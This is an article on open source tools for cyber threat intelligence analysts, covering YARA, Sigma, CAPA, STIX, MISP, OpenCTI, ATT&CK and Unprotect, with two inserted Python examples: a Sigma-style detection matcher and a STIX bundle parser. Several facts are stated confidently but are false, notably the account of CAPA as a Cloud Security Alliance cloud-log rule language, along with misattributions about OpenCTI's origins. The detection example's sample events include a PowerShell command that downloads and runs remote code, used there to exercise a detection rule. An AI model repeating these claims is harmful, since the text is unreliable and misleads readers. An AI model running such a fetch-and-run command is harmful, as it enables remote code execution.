Top Eight Open Source Tools for Cyber Threat Intelligence Analysts

What are the must-haves in a CTI analyst’s toolbox?

Cyber threat intelligence (CTI) is a cat-and-mouse game where threat hunters must constantly innovate to keep pace with hackers as they pivot and evolve their intrusion tactics, techniques and procedures (TTPs).

To stay ahead of the curve, CTI analysts have a myriad of open source tools and frameworks at their disposal. But with so many tools to choose from, it can be difficult to know where to start.

Infosecurity has compiled a list of some of the critical tools CTI analysts should know in order to detect suspicious activity, share intelligence and conduct their investigations.

Detecting Logs and Malware: YARA, Sigma, and CAPA Rules

Detecting suspicious activity on a device, within a network or on the internet is a crucial skill for security operation center (SOC) analysts as well as for threat hunters. For this, they can use various rule-based frameworks, including YARA, Sigma and CAPA.

YARA, which stands for Yet Another Recursive Acronym, is a malware-classification rule language developed by VirusTotal’s Victor M. Alvarez and released on GitHub in 2013. YARA rules are based on regular expressions and can be used to match specific patterns of bytes or strings in files. YARA rules are often used together with other tools, such as antivirus software and sandboxes, to detect and analyse malware.

Sigma is a rule language developed in 2017 by Florian Roth and Thomas Patzke. It’s similar to YARA but is specifically designed for use with security information and event management (SIEM) systems. Sigma rules can be used to match specific patterns of events in SIEM logs, and they can be used to trigger alerts or other actions.

The CAPA rule language was developed by the Cloud Security Alliance (CSA) in 2018 in response to the increasing number of cloud-based attacks. CAPA rules can be used to match specific patterns of activity in cloud logs, and they can be used to trigger alerts or other actions. 
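
To make the Sigma paragraph concrete, here is an added example (not code from the article or from the Sigma project): a minimal Sigma-style matcher that evaluates a rule's field modifiers and a `selection and not filter` condition against constructed process-creation events, and reports the rule's ATT&CK tags for each hit. The rule, the events and the user/host names are all constructed for this example; the detection block is written as a Python dict instead of YAML so the block runs without a YAML library.

```python
# Added example (not from the article): a minimal Sigma-style matcher run over constructed events. The
# detection block is a Python dict instead of YAML (no YAML library needed); fields follow Sysmon process-creation events.
SIGMA_RULE = {
    "tags": ["attack.execution", "attack.t1059.001"],
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"]},
        "filter": {"User|startswith": "NT AUTHORITY\\"},  # suppress SYSTEM/service-account noise
        "condition": "selection and not filter",
    },
}

# Constructed sample events, already parsed into fields the way a SIEM stores them.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "CORP\\alice",
     "CommandLine": "powershell -nop IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell Invoke-WebRequest http://example.invalid/update.ps1"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\bob", "CommandLine": "cmd /c whoami"},
]

# Sigma value modifiers. Sigma string comparison is case-insensitive, hence the lower() calls below.
MODIFIERS = {"contains": lambda v, e: e in v, "startswith": str.startswith, "endswith": str.endswith, "": str.__eq__}

def search_matches(search, event):
    """A search map matches when every field matches (AND); a list of values for a field is OR."""
    for key, expected in search.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if field not in event or not any(MODIFIERS[modifier](str(event[field]).lower(), str(x).lower()) for x in values):
            return False
    return True

def evaluate(rule, event):
    """Evaluate flat conditions such as 'selection', 'a and b', 'a and not b' (no parentheses)."""
    det, result, op, negate = rule["detection"], None, "and", False
    for tok in det["condition"].split():
        if tok in ("and", "or"):
            op = tok
        elif tok == "not":
            negate = True
        else:
            val = search_matches(det[tok], event) != negate  # '!=' acts as XOR with negate
            result = val if result is None else (result and val if op == "and" else result or val)
            negate = False
    return bool(result)

def run_rule(rule, events):
    """Return (event index, ATT&CK technique tags) for every event the rule fires on."""
    techniques = [t for t in rule["tags"] if t.startswith("attack.t")]
    return [(i, techniques) for i, ev in enumerate(events) if evaluate(rule, ev)]
```

Only the first event fires: the second is excluded by the `filter` search even though `selection` matches it, and the third never satisfies `selection`.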

Sharing Intelligence: STIX, OpenCTI and MISP

CTI is a vibrant field with threat hunters working for government agencies, cybersecurity vendors, consultancies or even as freelance security researchers. Some may work in parallel on the same malware or malicious activity clusters – sometimes without knowing it. The open source community has developed information-sharing tools to break this silo mentality.

The Structured Threat Information Expression (STIX), developed by the MITRE Corporation in 2012, is a standardized XML-based language for conveying data about cybersecurity threats in a common format that both humans and security technologies can easily understand.

The Malware Information Sharing Platform (MISP), developed by Andras Iklody in 2012, is an open source platform for collecting, storing, sharing and analyzing cyber threat intelligence. It builds on Trusted Automated Exchange of Intelligence Information (TAXII), a protocol for exchanging STIX-formatted information, and is designed for use by a variety of organizations, including government agencies, financial institutions and private companies.

OpenCTI was developed by the French national cybersecurity agency (ANSSI) in 2016, with contributions from a variety of organizations, including the European Union Agency for Network and Information Security (ENISA) and the Financial Services Information Sharing and Analysis Center (FS-ISAC). It is an open source platform for managing cyber threat intelligence based on the STIX and TAXII standards, which makes it easy to share threat intelligence with other organizations.
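
As an added example of what "STIX-formatted information" looks like on the wire (not code from the article, MISP or OpenCTI), the block below builds a small STIX 2.1 bundle, the JSON form that current MISP and OpenCTI deployments exchange over TAXII (STIX 1.x used XML), then parses it back: it validates object ids, follows the `indicates` and `uses` relationship objects from a malware family, and pulls the observables out of the indicator's STIX pattern along with the ATT&CK technique id. The malware name, the domain, the hash of 64 zeros and every id are placeholders constructed for this example.

```python
import json
import re

# Added example (not from the article): parse a STIX 2.1 bundle, the JSON form that MISP and OpenCTI
# exchange over TAXII today (STIX 1.x was XML). All ids, names and indicator values are placeholders.
TS = "2024-01-01T00:00:00.000Z"
def sdo(kind, d, **fields):  # constructed STIX 2.1 object; the id is a UUIDv4-shaped placeholder built from digit d
    return {"type": kind, "spec_version": "2.1", "id": f"{kind}--{d*8}-{d*4}-4{d*3}-8{d*3}-{d*12}",
            "created": TS, "modified": TS, **fields}

malware = sdo("malware", "2", name="ExampleLoader", is_family=True)
indicator = sdo("indicator", "3", pattern_type="stix", valid_from=TS,
                pattern="[domain-name:value = 'c2.example.invalid' OR file:hashes.'SHA-256' = '" + "0" * 64 + "']")
technique = sdo("attack-pattern", "4", name="Command and Scripting Interpreter: PowerShell",
                external_references=[{"source_name": "mitre-attack", "external_id": "T1059.001"}])
BUNDLE_JSON = json.dumps({"type": "bundle", "id": "bundle--11111111-1111-4111-8111-111111111111",
    "objects": [malware, indicator, technique,
                sdo("relationship", "5", relationship_type="indicates", source_ref=indicator["id"], target_ref=malware["id"]),
                sdo("relationship", "6", relationship_type="uses", source_ref=malware["id"], target_ref=technique["id"])]})

STIX_ID = re.compile(r"^[a-z][a-z0-9-]*--[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$")
COMPARISON = re.compile(r"([\w-]+:[\w.'-]+?)\s*=\s*'([^']*)'")  # "object-path = 'value'" terms of a STIX pattern

def load_bundle(text):
    """Parse a bundle into {id: object}, rejecting malformed ids and objects without spec_version."""
    bundle = json.loads(text)
    if bundle.get("type") != "bundle":
        raise ValueError("not a STIX bundle")
    objects = {}
    for obj in bundle["objects"]:
        if not STIX_ID.match(obj.get("id", "")) or not obj["id"].startswith(obj.get("type", "") + "--"):
            raise ValueError(f"malformed id {obj.get('id')!r}")
        if "spec_version" not in obj:
            raise ValueError(f"missing spec_version in {obj['id']}")
        objects[obj["id"]] = obj
    return objects

def related(objects, obj_id, rel_type, reverse=False):
    """Follow relationship objects: targets of obj_id (forward) or sources pointing at it (reverse)."""
    src, dst = ("target_ref", "source_ref") if reverse else ("source_ref", "target_ref")
    return [objects[o[dst]] for o in objects.values()
            if o["type"] == "relationship" and o["relationship_type"] == rel_type and o[src] == obj_id]

def summarize_malware(objects, name):
    """Walk the graph from a malware family to its indicator observables and ATT&CK technique ids."""
    mal = next(o for o in objects.values() if o["type"] == "malware" and o["name"] == name)
    iocs = [dict(COMPARISON.findall(i["pattern"])) for i in related(objects, mal["id"], "indicates", reverse=True)]
    techniques = [r["external_id"] for ap in related(objects, mal["id"], "uses")
                  for r in ap.get("external_references", []) if r["source_name"] == "mitre-attack"]
    return {"indicators": iocs, "techniques": techniques}
```

`summarize_malware(load_bundle(BUNDLE_JSON), "ExampleLoader")` returns the domain and hash from the indicator pattern plus `["T1059.001"]`, which is exactly the kind of pivot an analyst performs after importing a partner's bundle.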

Mapping TTPs: MITRE ATT&CK and Unprotect Project

Mapping threat actors’ TTPs is crucial to a CTI analyst’s work. However, the siloed nature of the profession meant that CTI analysts used to create their own taxonomies to describe the tactics and techniques they identified.

In 2013, the MITRE Corporation developed the Adversarial Tactics, Techniques, and Common Knowledge (MITRE ATT&CK) framework following its Fort Meade Experiment (FMX), a research project that was designed to improve post-compromise detection of threats through telemetry sensing and behavioural analysis.

The MITRE ATT&CK matrix serves as a shared knowledge base for mapping the TTPs used by different threat actors. It has quickly become a standard tool for CTI analysts, as well as for red teamers and incident responders, and is used by a majority of threat intelligence providers.

However, while the TTPs are regularly updated as new techniques are discovered, MITRE ATT&CK does not provide a complete classification of the evasion mechanisms employed by malware developers.

That’s why Jean-Pierre Lesueur, a security researcher at Phrozen and Synack Red Team, and Thomas Roccia, a senior security researcher at Microsoft, launched the Unprotect Project in 2015.

Unprotect is an open source database of malware evasion techniques. It classifies techniques into 13 categories and supports several detection rule formats, including YARA, Sigma and CAPA.

In his latest book, Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, published in June 2023, Roccia explained in more detail how CTI analysts can leverage all these tools and many others.